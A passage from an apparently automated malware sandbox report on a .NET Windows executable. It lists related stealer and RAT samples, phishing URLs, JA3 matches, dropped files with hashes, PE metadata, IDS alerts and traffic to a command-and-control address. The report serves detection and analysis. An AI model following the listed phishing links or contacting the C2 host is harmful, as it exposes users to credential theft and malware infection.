                            https://uglb4.roperelo.com/caGPey/Get hashmaliciousUnknownBrowse
                            • 104.17.2.184
                            tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 104.26.13.205
                            https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29tGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.2.184
                            19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5sGet hashmaliciousHTMLPhisherBrowse
                            • 188.114.96.3
                            https://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqgGet hashmaliciousHTMLPhisherBrowse
                            • 1.1.1.1
                            SALSGIVERUSbeK7HmoXro.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            ocuALPV2c7.exeGet hashmaliciousNjratBrowse
                            • 147.185.221.19
                            x433.exeGet hashmaliciousXWormBrowse
                            • 147.185.221.20
                            fg}.exeGet hashmaliciousXWormBrowse
                            • 147.185.221.20
                            build.exeGet hashmaliciousRedLineBrowse
                            • 147.185.221.20
                            bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            V6363OW8Rh.exeGet hashmaliciousXWormBrowse
                            • 147.185.221.18
                            x6221haMsm.exeGet hashmaliciousUnknownBrowse
                            • 147.185.221.18
                            Ph58Rkdxor.exeGet hashmaliciousXWormBrowse
                            • 147.185.221.20

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            54328bd36c14bd82ddaa0c04b25ed9adbeK7HmoXro.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            1mXbuDDPbF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            • 104.20.3.235
                            k8TljgjfDl.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 104.20.3.235
                            IMG_0178520003023PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            • 104.20.3.235
                            MT_01452_03607PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            • 104.20.3.235
                            fin.746.msiGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            ar4gzBvJIU.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            ar4gzBvJIU.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xdwdMicrosoft Paint.exe.log

                            Download File
                            Process:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):871
                            Entropy (8bit):5.36845336122342
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
                            MD5:15332C93136041700B0E3D5AEB01CFCE
                            SHA1:77EBA09260200C3EA967778E460A7A0D83A2E152
                            SHA-256:5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
                            SHA-512:419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xdwdPutty.exe.log

                            Download File
                            Process:C:\Users\user\xdwdPutty.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):871
                            Entropy (8bit):5.36845336122342
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
                            MD5:15332C93136041700B0E3D5AEB01CFCE
                            SHA1:77EBA09260200C3EA967778E460A7A0D83A2E152
                            SHA-256:5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
                            SHA-512:419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\z4wwumki.3zg.exe.log

                            Download File
                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):871
                            Entropy (8bit):5.36845336122342
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
                            MD5:15332C93136041700B0E3D5AEB01CFCE
                            SHA1:77EBA09260200C3EA967778E460A7A0D83A2E152
                            SHA-256:5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
                            SHA-512:419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bualqehm.tg1.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvdx4sk4.juy.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofa54sbh.fmc.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyfizagb.qiw.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):739685376
                            Entropy (8bit):0.006637695644790447
                            Encrypted:false
                            SSDEEP:
                            MD5:BFC9AA287C7AFD68C03066A887B123AE
                            SHA1:3819C6679BBA7ABC77149C0760022B8721CC8FEC
                            SHA-256:0BCB524EAA5BE4D110C59D8AD0268187D5F1F283268B43A95ED49642FD8F7CC4
                            SHA-512:9D42F3D22F7F47F5EAD5585D12CC3C892997C4D1BA4CF081F4EAE404563EFECCDDB29710206A4C7DD1A67FD8F66D1120E19A66B19C2E9DE4C5B738B63D2A125A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oA............"...0..$..........>B... ...`....@.. ....................... ............@..................................A..K....`..,............................................................................ ............... ..H............text...D"... ...$.................. ..`.rsrc...,....`.......&..............@..@.reloc..............................@..B................ B......H.......t...|-...........;..i............................................W......H3.......W......3.........(....*b.{.....oP...(Q....oR...*.(....(M...sT........(....(M...sT........( ...(M...sT........*J.s....}.....(....*...$...*.s.....%...*.(l...*..o....*.(....*.s.... .:.. 0u..o....(....~=...(p...&*.s.....*...*..*j(1...(M...~/...(h....-...*V(i....Y...(j....Z...*".(.....*..(..... D.. XB..ai.....r.).p.................*..0..........r...p*...0..........r...p*...0..........r...p*..

                            C:\Users\user\Videos\xdwdPutty.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):439296
                            Entropy (8bit):4.903374553746864
                            Encrypted:false
                            SSDEEP:3072:6fimTeNby2U0j0JvuhTNeN3w/jhlhE1Z8Nig9zEbv8+bigx1XXbP1XcPgmzGTQc:nUeNpqYe6VlWT8b9zEbPb3nHbVj
                            MD5:D843D2F7E8D6DD8B1490C0EABA86F5CC
                            SHA1:10C77F4BADE67D5B918DF573C4A2D15F1E829186
                            SHA-256:F9D2399892094D566D8C0C0841A2ED5EE520D892A5565D12B315E1058B968334
                            SHA-512:E1A9B2DB4F8F1BB6D3A7FED50F555B3082109E937015B34023483746BF8EEBE9D043E0DCA57022AD97E538CBFFDF9B0919C0403A49F864496F9A1B5EDA50A7F5
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oA............"...0..$..........>B... ...`....@.. ....................... ............@..................................A..K....`..,............................................................................ ............... ..H............text...D"... ...$.................. ..`.rsrc...,....`.......&..............@..@.reloc..............................@..B................ B......H.......t...|-...........;..i............................................W......H3.......W......3.........(....*b.{.....oP...(Q....oR...*.(....(M...sT........(....(M...sT........( ...(M...sT........*J.s....}.....(....*...$...*.s.....%...*.(l...*..o....*.(....*.s.... .:.. 0u..o....(....~=...(p...&*.s.....*...*..*j(1...(M...~/...(h....-...*V(i....Y...(j....Z...*".(.....*..(..... D.. XB..ai.....r.).p.................*..0..........r...p*...0..........r...p*...0..........r...p*..

                            C:\Users\user\xdwdPutty.exe

                            Download File
                            Process:C:\Users\user\Desktop\ptKNiAaGus.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):740754944
                            Entropy (8bit):0.008367695155420383
                            Encrypted:false
                            SSDEEP:
                            MD5:8BBEF39EBACCBCCEF26BE354545B98BD
                            SHA1:7CA909801E7CBDA26A80AB62FCB0E64A14F2FDD8
                            SHA-256:BC7E76E22B7E37571D5DF21EE886939DDACD95DCF3FEAEF8B2498369CF30965E
                            SHA-512:935933D78FF0D1E8B86B47E52D75B56514C70D418374F400E833BDFA50167AA7862A46262C2D1A238C5AF1CD0B39B90FEB0C6AC7F517747E4C84C2704BA04ADB
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oA............"...0.................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......h...x3..............i............................................W......H3.......W......3.........(....*b.{.....oO...(P....oQ...*.(....(....sS........(....(....sS........( ...(....sS........*J.s....}.....(....*...$...*.s.....%...*.(....*..o....*.(....*.s.... .:.. 0u..o....(....~=...(....&*.s.....*...*..*j(1...(....~/...(i....-...*V(i....Y...(j....Z...*".(.....*.r.J.p...........r.J.p.....r.J.p.....*..(.....#KP....A#......A(....X(.....1.....2.....3...*..(....rj[.p.y..

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.852068444021136
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:ptKNiAaGus.exe
                            File size:460'288 bytes
                            MD5:4410af8bec1266d76029f9bb042c6a73
                            SHA1:632a7eadf55f09d8ba0d9641ae1adaa921aaf5fa
                            SHA256:04783068a4bc4ce6a3f2e8ed35d40528b84ddb9c1a0ad2f39fb5634eb5f8295a
                            SHA512:fc3e2690c2e7b90c966d80e4fe928e3bc4c60d637c7e435ddf93f90974bb9ab3b37610ef5f27d7d0da6440514d79a5005d2734123d4b92e1b53891860454c5c2
                            SSDEEP:6144:Tyin4KCcmF9+h1qB64e6VlWT8b9smCJgBf8+gllo1bXrGxNSlAdfpfEKc7T:TyDtceUHsPVle8KYB5/rG+WdfpcKc
                            TLSH:E7A4A20CFE91E805CE1E3D77CFE614104B7125C22E2292563159AFFE8B6937668E267C
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oA............"...0.................. ... ....@.. .......................`............@................................

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0x47182e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x717e00x4b.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x720000x68c.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x6f8340x6fa00f7929da36e2e77b7120c5ecfe403afb3False0.48387414263717804data5.859433184339624IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x720000x68c0x800467901400c844c9de380140ddca5fb1fFalse0.37548828125data4.607550869331143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x740000xc0x200ac4d1f497711cb30e60c49eb568d2eccFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0x720a00x400MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"0.439453125
                            RT_MANIFEST0x724a00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            07/03/24-15:50:29.602801TCP2851746ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin4974044998192.168.11.20147.185.221.18
                            07/03/24-15:50:31.680170TCP2851746ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin4974144998192.168.11.20147.185.221.18
                            07/03/24-15:50:36.268137TCP2851746ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin4974544998192.168.11.20147.185.221.18

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 3, 2024 15:50:09.673701048 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:09.673727989 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:09.673932076 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:09.684365988 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:09.684382915 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:09.933675051 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:09.934799910 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:09.936494112 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:09.936502934 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:09.936773062 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:09.970341921 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:10.012185097 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:10.222788095 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:10.222893953 CEST44349734104.20.3.235192.168.11.20
                            Jul 3, 2024 15:50:10.223881960 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:10.227490902 CEST49734443192.168.11.20104.20.3.235
                            Jul 3, 2024 15:50:10.407311916 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:10.568078995 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:10.568550110 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:50:11.013326883 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:50:16.034322023 CEST4973980192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:16.152879953 CEST8049739104.16.185.241192.168.11.20
                            Jul 3, 2024 15:50:16.154191017 CEST4973980192.168.11.20104.16.185.241
                            Jul 3, 2024 15:50:16.154191017 CEST4973980192.168.11.20104.16.185.241
